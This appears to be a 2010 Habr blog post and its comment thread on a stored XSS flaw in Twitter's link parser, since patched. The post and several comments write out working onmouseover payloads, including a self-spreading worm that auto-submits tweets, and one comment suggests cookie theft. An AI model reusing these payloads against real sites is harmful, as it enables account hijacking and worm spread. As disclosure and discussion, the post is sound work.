Пользователь
0,0
рейтинг
21 сентября 2010 в 14:38

Разработка → Активная XSS на Twitter

Скриншот (спасибо lc0d3r):

image
Пример: twitter.com/mr_the/status/25105420721 (там только alert)

Началось всё отсюда (банальное раскрашивание через css) twitter.com/RainbowTwtr, автор не известен.

Достаточно отпостить твитт вида:
http://twitter.com/mr_the#@"onmouseover="jAvascript:alert('Ha-ha! XSS!');"/
и будет много-много радости.

Собственно причина — плохой парсер ссылок, без должной фильтрации.

В целях безопасности, рекомендую временно отключить выполнение JavaScript на twitter.com.

UPD: В NewTwitter xss не работает.
UPD2: На 15:52 (по Киеву) закрыли возможность отправлять подобные твитты. Старые всё ещё работают.
UPD3: 16:46 по Киеву, уязвимость официально закрыли — status.twitter.com/post/1161435117/xss-attack-identified-and-patched
mrThe @mrThe
карма
29,8
рейтинг 0,0
Реклама помогает поддерживать и развивать наши сервисы

Подробнее
Спецпроект

Самое читаемое Разработка

Комментарии (105)

  • +2
    Молодец!

    Фильтруйте все данные приходящие от пользователя!!!
    • +1
      В NewTwitter — работает все еще! При открытии нет, но когда идет обновление, через каждые n секунд выдается alert.
    • 0
      Мне вот такую штуку послали (пробел после http надо убрать):

      http ://t.co/@«onmouseover=»document.getElementById('status').value='RT MoiMrJack';$('.status-update-form').submit();«font-size:500pt;/
  • +1
    Это такой маркетинговый ход, чтобы все переходили на новую версию твиттера, так как там это не работает :)

    Кстати, так можно спастить от бага до офф. фикса
    • +3
      Проблема в том, что возможность перейти на новый твиттер есть далеко не у всех)
      • +1
        А у кого?
        • +2
          У избранных великим рандомом! Во всяком случае, в моей ленте новый твиттер может включить всего несколько человек, включая меня.
          • 0
            А как ты его включаешь? Через настройки?
      • 0
        А как вообще узнать, есть у меня эта возможность, или нет?
        • +7
          Сверху появится вот такая кнопочка:
          • +1
            Может, если подделать кнопочку у себя, она и у других включится?
            • 0
              Проверяли уже — не включается. По клику идёт вот такое обращение: twitter.com/account/use_phx?setting=true
              Попробуйте, вдруг получится.
              • 0
                Все-таки нет. Ничего, скоро и на нашей улице будет праздник.
              • 0
                А у меня сработало и включилось. Спасибо!
                Предложения как на скриншоте выше у меня не было.
                • +2
                  Кстати, у меня это предложение блокировал один из плагинов)
          • 0
            Понятно, спасибо!
  • +7
    хреноватенькие тестеры у них
    • 0
      Им походу нужно форсировать распространение новой версии. Если она так долго по серверам ползет, как долго будет распространяться фикс?
  • +1
    А ведь стоит написать короткий скрипт, и добавить к нему трендовый хештег — и можно насобирать кучу кукисов. Кукисы с твиттера чегонибудь дают?
    • –1
      сморя че в них хранится
      • 0
        Авторизация хранится. Можно зайти под чужим аккаунтом, подменив куки.
    • +3
      некоторые сайты используют для авторизации твиттеровский OAuth
  • 0
    Так, черт, я туплю :) Пытался дотянуться до крестика вкладки, проводя мышь напрямую, через ссылку, уберите это :)
  • 0
    Разноцветные твиты twitter.com/RainbowTwtr появились у меня на странице, сразу все одновременно, хотя я этого RainbowTwtr не фоловил. Через минуту они исчезли.
    • +2
      Значит кто-то из тех кого вы фолловите ретвитнул сообщения RainbowTwtr, а потом нажал Undo
  • +3
    twitter.com/biophreak у меня теперь настоящий коммунистический твиттер (:
    • +1
      А теперь то же самое с хеш-тегом, например #prinsjesdag
      • 0
        с хештегом не работает — постит текстом… либо у меня руки не оттуда :)
        Можете попробовать, если че:
        twitter.com/thenickname#@"style="background-color:red;color:red;position:fixed;left:0;top:0;width:100%;height:100%;z-index:9999999"/
  • 0
    Баги твиттера иногда задалбывают. Вроде кучу денег вложили в проект, почему так трудно довести его до ума?
  • +12

    Переходим на CSS3 ;-)
  • +17
    Новый тренд. Самое впечатляющее JS-приложение в 140 символах.
    • +1
      меньше, там еще ссылка, собачка, решетка, и мелочи всякие (:
  • 0
    возвращаемся к временам ASM, приложение в минимальном количестве символов )
  • 0
    Я вижу используют эту xss. Давайте хоть тег писать #twitter_xss?
    • +2
      символов и так мало ))
  • 0
    Noscript как бе говорит «пофигу» ))
  • НЛО прилетело и опубликовало эту надпись здесь
  • +2
    всё, черви пошли. не ходите на вебморду
  • +6
    Twi-вирус:
    http: //a.no/@"onmouseover=";$('textarea:first').val
    (this.innerHTML);$('.status-update-form').submit()" style="color:#000;background:#000;/
    • 0
      Аха, уже вся лента забита. Прикольно.
  • +1
    Мне пришел авторетвит: habreffect.ru/files/ba1/06e3909e1/rt.png
    Наводишь мышку и автоматом ретвитишь.
  • 0
    А никто не пробовал еще размещать js на внешних ресурсах и подгружать их?
    • 0
      хм…
    • 0
      просто в таком случае можно-же будет вешать события не на mouseover, а, скажем на mousemove и так далее
      • 0
        ссылка выше на twitter.com/superbacker у него есть такие попытки, наводить проверять не стал )))
        • 0
          Ха, работает… бугагашенька…
    • 0
  • +1
    Мужики, хорош херней страдать! Лента в твиттере уже совсем нечитаема
    • 0
      ну когда еще такое будет… ща наиграются все и надоест )
    • +1
      это же старая дырка… там клиент не фильтровался вроде.
    • 0
      Это старая уязвимость.
  • НЛО прилетело и опубликовало эту надпись здесь
    • –1
      это не акк балуется, а твивирус распространется.
      • НЛО прилетело и опубликовало эту надпись здесь
  • –1
    А какой командой удаляются аккаунты? :)
  • 0
    Сейчас лучше вообще не заходить на веб-морду, запросто вирусняк подцепишь.
  • +1
    Хватит во зло использовать, смотрите и радуйтесь: twitter.com/myfreeweb/statuses/25112218506
    • 0
      Что там было?)
  • +1
    В ленте пипец просто настал.
    Спас Firebug…
  • –5
    Я понимаю когда найденную довольно опасную уязвимость используют обычные пользователи. Но когда крупная компания, которая стремилась создать себе на Хабре «имя» тоже начинает грешить этим — это переходит все грани. И этой самой фирмой, как ни удивительно, снова оказалась Вконтакте. Вот скриншот:



    А вот тут можно глянуть исходный код, дабы исключить фальсификации. И я даже догадываюсь кто это сделал.
    • +6
      крупная компания грешит ламерством
      • –2
        Это весьма заметно. Сообщение больше 10 минут не удалялось, да и почти одновременно последовавший ретвит несколько другого сообщения от самого Цыплухина как бы намекает. Понабирали по объявлениям…
    • 0
      Дуров, кто-же еще =)
    • +9
      Забавно, даже когда пишут пост о критической уязвимости на сайте twitter.com, доблестные хабра-юзеры умудряются найти повод написать про то, какой нехороший сайт vkontakte.ru.
    • +3
      так это они зашли в свой твиттер через морду и словили хак, который отретвитился дальше, разве нет?
    • 0
      Хотите сказать, что Вконтакте преднамеренно это сделала?
      • –1
        За менее чем десять минут можно было сообщение удалить? Вроде как люди не совсем далекие от темы, должны были сообразить что это значит.
  • 0
    Попался два раза на авторетвите. Firebug помог.
    А вообще, mobile.twitter.com и никаких глюков в веб-морде :)
  • 0
    «В целях безопасности, рекомендую временно отключить выполнение Javascript на twitter.com.»
    Твиттер без скрипта не работает.
  • 0
    В целях безопасности сейчас лучше всего использовать внешние клиенты.
  • 0
    Вся лента теперь в этих отправлениях.
  • НЛО прилетело и опубликовало эту надпись здесь
    • +5
      новая твиттер версия упячка
  • 0
    Всё, уже вылечили.

    Кто-нибудь может подсказать, как расшифровываются подобные строки? (переходить не рекомендую, возможно вирус):
    http:\u002f\u002fis.gd\u002ffl9A7
  • 0
    <script language="javascript">
    	document.write('http:\u002f\u002fis.gd\u002ffl5d3')
    </script>
    • +1
      сорри, это был ответ на сообщение EvgeniyLazarev
  • 0
    • 0
      Что оно делает?
  • –4
    уже достало говорить что пора юзать dabr.co.uk или sexymonday.ru/dabr
    • +4
      уже достало
  • +3
    Новое приложение Твиттера «RainbowTwtr» по популярности затмило «Ферму». ВКонтакте — рыдает :)
  • +1
  • 0
    Ну вот и пофиксили
  • +5
    Ждём, когда @KremlinRussia ретвитнет радугу :)
    • 0
      или @KermlinRussia :)
  • НЛО прилетело и опубликовало эту надпись здесь
  • +6
    Почему до сих пор нет Властелина?
  • 0
    @ekozlov, @Unlevin, @alexa_cocacola — заставляют ретвить их посты скриптом всех кто за ними следует. Побанить бы их всех за такое… Бедный твиттер
    • НЛО прилетело и опубликовало эту надпись здесь
    • НЛО прилетело и опубликовало эту надпись здесь
    • 0
      Это не они, это скрипт сам рассылает эти твиты. Ретвитит сам себя и так распространяется.
  • +1
    Вообще-то уже браузер сам ретвитет кого угодно. Ахтунг. Закрываем твиттер и отдыхаем.
    • 0
      У меня тоже браузер сам сделал ретвит кода, ретвитов 100+. при этом home, странно себя ведет, делает редирект на direct messages.
      • 0
        Вот, это и я зацепил.
  • +1
    Я просто оставлю это здесь:
    mobile.twitter.com/
    • НЛО прилетело и опубликовало эту надпись здесь
  • +1
    Я горжусь, что меня фолловит @mr_the :D
  • +2
    Пофиксили. Расходимся (:
  • –7
    кому это интересно? Твиттеры вместе с вконтактами пора поставить на пыльную полочку и забыть о них.
  • +1
    А у меня после всех этих забав, главная твиттера выглядит вот так,

Только зарегистрированные пользователи могут оставлять комментарии. Войдите, пожалуйста.